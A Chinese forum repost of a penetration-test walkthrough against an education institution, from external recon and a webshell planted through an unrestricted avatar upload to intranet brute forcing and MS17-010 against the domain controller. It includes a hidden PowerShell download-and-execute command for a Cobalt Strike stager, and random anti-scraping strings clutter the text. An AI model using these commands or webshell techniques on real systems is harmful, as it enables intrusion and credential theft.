找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2112|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

( r2 t# k0 c6 w* q 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路4 i8 |+ U. u# M' O4 y& a. o! r

" L3 j! J0 z. Y

) M3 A Y# t6 f9 t9 y  8 O& v- M5 \1 V5 W6 E

+ K8 F2 i G7 ^' X1 w

) W& i( L& f0 X" h s 正文 0 n% E1 Z$ B) W- D3 K9 s

4 [! o) |4 x7 k) K" o* }4 ]9 `0 |

8 w; M `% l# r, o3 w  ; A( ~, W/ ?+ N4 l% y9 Y

# W; L' y X5 K2 `" E7 O

. j9 i! t, w8 x4 q: c6 v, H3 ?4 k# c 目标:www.xxxx.com(一家教育机构)
$ V' |5 x1 b; B/ t. g5 Y
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
: i, b$ L( v' ?% b% V0 s' O& r

! W3 c+ ^4 B; n- G+ B1 @/ u

7 Y5 \$ b* o$ b0 K" P. M+ A: }% G vshapes=5 J7 g' X+ E# G7 l7 w! K

8 U( ?0 n S; y( M

4 |: H/ B% | x ~% _ Y 进行了简单的信息搜集
: U z+ T. x" j4 a4 {9 K; i1 t$ \
) I6 U: p! ]# \" W/ z( u
( N: m. Y8 O) c/ j8 K% ?! j1 C

0 F R4 x( O6 l& T* c% O6 W

2 O" Y( n ?& Y9 g" X 子域名搜集3 A* H& n% k7 H

8 i' E3 s& g, W" c2 v1 `

1 `8 n) q3 `& }6 T% ^" c: w vshapes=2 j& \* B1 K. a: Y4 ]$ j" Z5 o5 R8 e

3 ~3 n$ M, z( N& _3 m' f; N4 \

' U: ^. G- y( [9 I P' n fofa找资产
7 }$ d. _2 h9 I( }& C
- P) [* S4 {5 \" u7 G. l
$ _1 w9 h9 q8 l2 h4 [6 X% \4 \$ ?

, j5 O$ W z; V+ w+ |

5 t% l4 L/ J1 E( `0 x vshapes= 2 E) @4 w0 ^( j( e: G2 x9 O- V

& D$ |. E* I% Q

4 h) n) Y4 u1 w 一共七个资产。去重之后只有两个。
. U' K0 A7 `- v1 k) w# W3 c+ `% x
9 s# G& l& [: H
' P# Q/ ^0 R- z |

7 C" A0 c4 f( R7 y5 h+ z V

- @: | m3 o; R$ h4 a 目录探测 4 Z. {) m; p5 J8 H8 h$ q& @ P4 S

# g B3 \/ b6 R8 z' ], Y0 w( v

( N: T3 B$ L9 `) g. k vshapes=# x0 E! B" R- E1 M$ ?9 P4 c' ~

6 A7 ~% s0 q9 i/ Y

) O9 C6 A7 e N' d3 W% b# Y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
( d3 C+ y# b- Q: h, ]/ X0 M
$ X( [- w: K9 W7 G1 S+ r4 d7 b
( r% f4 ~% X" P1 ]# ]

- F( y/ @1 v: S, M X4 C3 B. }: c8 \& X) _

8 S, }6 g9 L/ k) ] 我又尝试了通过修改返回包来绕过登录界面 . _0 b! {- }7 e" z$ w) y

$ c# H4 ~* X5 |% q& o% G" j

) h# E/ l, k- e) S n8 O/ k" \ vshapes= 4 c% j- d' u- c$ B

0 v2 p- K2 P5 ^2 Y) O% X

5 y* n1 M1 K3 V8 {7 R0 n/ c 还是不行,尝试注入无果 ) }5 P/ v/ j3 ]8 G! P& d4 B& a6 K

! b# a7 A) C x3 K

. @' ^4 Y( e/ n vshapes= * p5 G6 F$ f+ t. t- k! t( b9 @

( y* n$ Y2 I8 ?) g! @6 p/ t7 X1 m

# p @) i% u4 E. ?5 Y 不过我目录探测出了一处Spring信息泄露
* Q4 j& J4 w5 s
7 b& z: F1 y( d8 y4 l3 Y; Z
# n+ f% m7 c4 K4 G" W; I

9 a, o6 e6 D* n0 m7 R

5 }$ v$ F1 O$ S; {: s: ? vshapes=& ]3 \% U h5 C: S

/ z9 N, c! U- Y' K1 v

" C7 j/ K d+ n u 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 l: I/ b, E% g' w4 G$ a8 x0 `

f, z9 @0 K# f7 Z

2 V" n# g' |& G( N" M0 d vshapes= 3 [& R, }0 M6 n m9 q

& t5 g6 a1 w6 M. f9 S& a6 W; W: w1 o

# P& u7 W! U! d& r 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 # r# ]3 f4 n, i

8 P7 U) ]5 l _0 w" z, j6 t. k# X

( Q2 G/ S `5 G) Z2 Q. _ vshapes= 7 q' ^, f5 f7 y8 L7 H

/ ]( Z8 Z8 s! \6 M

, `3 X: C1 o" f7 m 获取有些师傅到这一步就手机抓包电脑测了。 2 S* n7 }( ^9 V7 ?) u x

/ }+ a+ L8 z* H( `2 U% F

) E1 [* _ }& F, S) j Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 : _4 S3 r5 v1 n' l7 j4 _( Y

: O: ?/ |% ^& _

. D( B0 ]7 J+ z& q0 i d+ g+ w' }; n2 G 其中在一个公众号发现了小程序,可以进行注册。- A* w) c8 r. s* p. P

* F7 y {$ \+ [* c9 H

& C/ ?8 q0 `+ y% r 看到了头像上传,尝试上传获取WebShell( N. q, V% B- F+ @

7 {; K% f+ I( r- Z

P' E4 ?9 E8 M4 x vshapes= F6 C/ }5 w% C, ]* y) w

2 ~6 R( o/ x, m" {* ~5 T! a

2 n2 x3 l5 I1 x5 S 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 + ]7 i5 ]! P1 r, g! g; \

2 _* E2 Y# R# n

5 B8 G( Z/ o9 n) R$ c vshapes= , t3 X. r$ Z9 J" t2 [& b

# e4 f* y0 K, h! ^8 d7 H$ d" Z

- r5 W) h; H) H/ c/ ?5 w* t 然后上了大马 % y: }8 q, U- j; M* |

! r! B/ n5 e2 p$ O

# z" a6 x3 o% \ vshapes= $ S& _' {' m0 ]+ L5 h

% C! e b( S5 f% }4 K

9 q* ]9 q$ ?, J8 I vshapes=# T, F9 ^ ^# j- B: _, `$ U/ d

' M. p$ e3 c# H

3 m" S0 r2 Y6 _. n- s2 p$ m! m 通过翻找文件发现数据库账号密码6 Q( n( u9 p; A' n) d

2 F. _* E, z! _5 u

$ `. M$ h4 [( R6 `1 z, K vshapes= 4 N) B' t8 Z; n; X! [4 N& _

( A9 C* q% R; ^# |- E

5 ^1 N+ _& }/ i9 @ --内网渗透' U+ j: ^& e1 @

* ]" c5 s2 E9 h0 o/ _/ }5 n2 B

1 ^) I7 M. E2 K 直接通过powershell执行 cs上线 ( A+ v9 ]" @0 V

& r' a% B0 X4 R4 c, F

2 u- V1 E' r8 O! b) D) H# \1 a2 x powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"0 P7 I; R5 e4 ^

O4 W5 z! X% F# R+ R3 _/ V( h/ [

9 L) F U3 y, X; G vshapes=! c4 c5 X6 N& a

; A( d& d: X* `5 c

8 ?2 }/ `9 A" i' S* d% L) | 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破; g. j4 x4 g8 h( `0 e! E

% J8 W- ~9 \8 U, V

2 z) n$ h* _8 o @ h$ i vshapes= 6 X3 B1 ` H+ t

% P$ E4 Y' A* [' b

8 y9 d2 r- N& @; Q* {6 m 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
/ u8 s5 G- N% k$ F
2 T, r4 i) ~: |: u7 s+ @( B) ]
( N; [. g, Q4 e* ]
& U$ `* y, t* K/ F3 k. Y% S

) y% v F& F( W! {8 E2 g3 a

/ b" r0 v2 A9 ]" O+ S& t& P p vshapes=& U) }& j% @( p7 ^/ N( I0 C

' P, B; b! L; H- i

# i& r3 g; E; {# X0 I+ ^7 y8 n 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
* N1 s$ v! a4 I+ {
7 V" I8 e" ~# O1 s9 s( U( x/ k
3 ^ n4 j4 r1 k$ w9 Z

6 Y7 h( C5 y5 l6 K3 d% a, Q

: t( H& t* j% X2 @ vshapes= : c' v! L: e# x: t' q

7 C5 }9 J3 o; g7 }6 O

+ N' s2 n; B% @4 N6 L* |/ `
( B* X) y% A1 w" _! i9 J
9 e+ U. D) O) {
; @; z$ X- o, U& e6 p& j; p

: [, _. e# R0 k! p' F

0 M. C9 C) B& c" C  : N7 s U6 D) N- D, Y

: j3 v; U( h" q" {

& ^5 L9 L$ v* ~" X' Q7 }5 { 小结+ t3 x. Y2 E9 ^+ j6 O, j! _: ~

W9 l5 j/ L3 o8 b: U; U5 U6 p

- Q1 Y. a; P3 ?5 e: i& N$ ?  : [. b; h; x' ]& _, h

w1 u% P$ ?% }/ J {0 A* Z, x

) s: ] P6 X0 B/ f1 N$ }; ~* n- S+ Y. Z 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!- u' `2 _7 ^5 H# R/ D

$ H- e+ ?! `# \ b& y

7 G( D. K3 [+ w2 v, K   ( b* P' t3 H. U8 \" n% U

, a- F3 N+ a! e. j( i" h. D
    % x% _0 U5 V! r* k- |% p5 L: {: D
  • ' b) q/ a: Q; }) U0 _, S- Y   7 S. f: P9 R: [* y% e( ~9 Y
  • 2 _* j' k: j, G% Q n, H
  • 4 t! Z* I+ _ C' `( d  " ?* |% R$ D6 p
  • * K2 A# p; e& U* A0 D: x" z
- W% @9 l, g; v& }3 c' T( V

# D" m- Z. ^6 r+ E 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html$ {' O" I9 M! h4 n% @! B

% D4 V! B' W4 b5 ~1 S1 C

: z$ j1 A5 y6 @! l) t; b4 @/ u  ; M; q/ y* H4 g4 j1 e9 S

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表